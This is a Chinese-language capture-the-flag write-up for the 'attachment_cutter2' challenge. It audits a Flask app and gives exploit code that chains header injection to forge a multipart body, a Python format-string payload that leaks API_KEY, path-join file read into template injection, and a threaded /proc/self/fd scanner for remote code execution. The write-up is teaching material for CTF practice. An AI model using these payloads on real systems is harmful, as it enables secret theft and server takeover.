attachment_cutter2

对给出的 src 进行审计:

1
2
3
4
client = request.values.get('client', "default")
token = request.values.get('token', "")
headers[client] = token
response = httpx.post(f"http://{HOST}/action", headers=headers, files=form_data, timeout=10.0)

这里可以控制 clienttoken,控制发送给 /action 的 HTTP Headers。允许注入 Content-Typeboundary,进而控制 multipart/form-data 的解析结构。

1
2
3
4
5
6
@app.route('/action', methods=['POST'])
def action():
content = file.stream.read().decode()
act = json.loads(action.stream.read().decode())
if act["type"] == "debug":
return content.format(app), 200

这里会对 content 进行字符串格式化。利用 {0.view_functions[admin].__globals__[API_KEY]} 读 API_KEY。

1
2
3
4
5
6
@app.route('/admin', methods=['GET'])
def admin():
tmpl = request.values.get('tmpl', 'index.html')
tmpl_path = os.path.join('./templates', tmpl)
tmpl_content = open(tmpl_path, 'r').read()
return render_template_string(tmpl_content), 200

任意文件读: tmpl 参数如果是绝对路径,os.path.join 会忽略前面的路径直接使用绝对路径,导致任意文件读取,进一步地导致 SSTI。

读 API_KEY

设置 client="Content-Type", token="multipart/form-data; boundary=----ctfboundary"。这使得 httpx 发出的请求 Header 中声明了我们指定的 boundary。

text 参数中,我们构造了一个伪造的 multipart body part,包含一个恶意的 action 字段("debug")。

通过 {0.view_functions[admin].__globals__[API_KEY]},读 APP 对象 的 view_funcitons 下的 admin 函数 里的 全局变量 apikey。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
boundary = "----ctfboundary"
payload_content = "{0.view_functions[admin].__globals__[API_KEY]}"
injected_part = (
f"\r\n--{boundary}\r\n"
f'Content-Disposition: form-data; name="action"; filename="action"\r\n'
f"Content-Type: text/json\r\n"
f"\r\n"
f'{{"type": "debug"}}\r\n'
f"--{boundary}--\r\n"
)
text_value = payload_content + injected_part
params = {
"text": text_value,
"client": "Content-Type",
"token": f"multipart/form-data; boundary={boundary}"
}
requests.post(url, data=params)

RCE

利用 Linux /proc/self/fd/N 特性,通过建立 socket 长连接 TCP 发送 HTTP 请求但是不关闭链接,使得 SSTI 的 fd 编号一直在服务器中存在再多线程扫描得到 SSTI 渲染后的结果。

1
2
3
4
5
6
7
8
9
10
def sender_worker():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((TARGET_IP, TARGET_PORT))
s.send(f"POST / HTTP/1.1\r\nContent-Length: {len(PAYLOAD)}\r\n\r\n{PAYLOAD}".encode())
time.sleep(1.0)
s.close()

# Scanner
def scanner_worker(fd):
requests.get(f"{URL}/admin", headers={"Authorization": API_KEY}, params={"tmpl": f"/proc/self/fd/{fd}"})